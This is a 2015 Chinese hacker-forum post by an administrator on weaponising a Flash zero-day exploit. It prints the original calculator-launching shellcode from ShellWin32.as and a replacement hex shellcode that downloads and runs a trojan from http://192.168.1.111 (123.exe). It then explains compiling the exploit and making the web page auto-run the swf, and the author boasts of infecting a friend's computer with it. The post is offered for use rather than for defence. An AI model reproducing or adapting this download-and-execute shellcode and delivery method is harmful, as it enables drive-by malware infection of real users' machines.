搜索
查看: 810|回复: 0

flash oday利用

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-7-30 18:01:04 | 显示全部楼层 |阅读模式
思路:
msf生成shellcode(exec下载者的,利用win下某漏洞)
然后把源码弹出计算机那段换成自己的exe文件
shellcode执行之后会下载exe文件,然后就中马~
当时测试成功了,把某基友电脑玩爆了~

修改地址:ShellWin32.as
shellcode原来代码:
  1. 0x83EC8B55, 0x5153ACC4, 0x058B6457, 0x00000030, 0x8B0C408B, 0x008B0C40, 0x588B008B, 0x03D88918,
  2.                                 0x508B3C40, 0x8BDA0178, 0xDF01207A, 0x078BC931, 0x3881D801, 0x61657243, 0x78811C75, 0x4173730B,
  3.                                 0x8B137500, 0xD8012442, 0x4804B70F, 0x011C528B, 0x821C03DA, 0xC78309EB, 0x4A3B4104, 0x8DCF7C18,
  4.                                 0x8D50F045, 0x3157AC7D, 0x0011B9C0, 0xABF30000, 0x44AC45C7, 0x50000000, 0x50505050, 0x0009E850,
  5.                                 0x61630000, 0x652E636C, 0x50006578, 0x595FD3FF, 0x03E0C15B, 0xC906C083, 0x909090C3
复制代码

是弹出计算器的意思,16进制,8位一组。

修改后:
  1. 0x8B64C933,0x408B3041,0x14708B0C,0x8BAD96AD,0x538B1058,0x8BD3033C,0xD3037852,0x0320728B,
  2.       0x41C933F3,0x81C303AD,0x74654738,0x81F47550,0x6F720478,0xEB754163,0x64087881,0x75657264,
  3.       0x24728BE2,0x8B66F303,0x8B494E0C,0xF3031C72,0x038E148B,0x51C933D3,0x78652e68,0x646c6865,
  4.       0x62687a68,0x686d7379,0x65646f63,0x6c656868,0x7773686c,0x52537366,0x72616851,0x4C684179,
  5.       0x68726269,0x64616F4C,0xD2FF5354,0x590CC483,0xB9665150,0x68516C6C,0x642E6E6F,0x6C727568,
  6.       0xD0FF546D,0x8B10C483,0x33042454,0xB96651C9,0x33514165,0x466F68C9,0x6F686C69,0x68546461,
  7.       0x6C6E776F,0x4C525568,0xFF505444,0x8DC933D2,0x51242454,0x47EB5251,0x83D0FF51,0xC9331CC4,
  8.       0x52535B5A,0x65786851,0x4C886163,0x57680324,0x54456E69,0x6AD2FF53,0x244C8D05,0xD0FF5118,
  9.       0x5A0CC483,0x7365685B,0x6C836173,0x68610324,0x636F7250,0x69784568,0xFF535474,0xE8D0FFD2,
  10.       0xFFFFFFB4,
  11.       //url http://192.168.1.111/123.exe\00
  12.       0x70747468,0x312f2f3a,0x312e3239,0x302e3836,0x3730312e,0x3830383a,0x32312f31,0x78652e33,0x65,0x00

  13.                         
复制代码

上面是exec下载,下面的是木马地址

然后编译一下,将直接的html那个submit改成直接执行swf,然后就看你的思路怎么淫荡了~~
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表